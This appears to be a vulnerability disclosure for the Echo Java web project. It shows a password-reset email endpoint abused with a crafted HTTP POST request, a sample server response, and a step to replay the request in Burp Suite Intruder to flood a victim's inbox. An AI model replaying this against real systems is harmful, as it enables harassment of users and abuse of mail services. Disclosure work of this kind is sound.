Echo

(Updated: )
CVE

Project Repository: https://github.com/Veal98/Echo

First, register a victim account named Pax, and set the email to 2472373483@qq.com. During the attack, we only need to know the victim’s username. This can be accessed via the /user/profile/id route, where id can be 1, 2, 3, etc.

Next, register another account named Pax1, and set any email address — this is not important.

What is important is configuring the project’s email settings properly:

1
2
3
4
5
6
spring.mail.host = smtp.sina.com.cn
spring.mail.port = 465
spring.mail.username = xxxxxxxxxxxx@sina.com.cn
spring.mail.password = xxxxxxxxxxxxxx
spring.mail.protocol = smtp
spring.mail.properties.mail.smtp.ssl.enable = true

This ensures that the email functionality works correctly.

Log in first, then craft a request to send to the /sendEmailCodeForResetPwd endpoint as shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /sendEmailCodeForResetPwd HTTP/1.1
Host: localhost:8081
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8081/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Phpstorm-63ee3e42=f81c2361-2176-493f-9d51-0d11580e937b; ticket=20b45e36b4f24f49bc5c287b06989f8d; JSESSIONID=0B10132A1A382BCAFB06F00F96BE7B8A; kaptchaOwner=1bcb6ff9ec4a4a37a5fa37d97b53702c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

kaptcha=1bcb6ff9ec4a4a37a5fa37d97b53702c&username=Pax

Response Packet:

1
2
3
4
5
6
7
8
9
10
11
12
HTTP/1.1 200 
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=UTF-8
Date: Fri, 23 May 2025 03:32:16 GMT
Content-Length: 119

{"errMsg":"图片验证码过期","msg":"已经往您的邮箱发送了一封验证码邮件, 请查收!","status":"0"}

**Screenshot of Successful Result:**Then place it in Burp Suite’s Intruder module for the attack.

Screenshot of successful result:

image-20250523135603544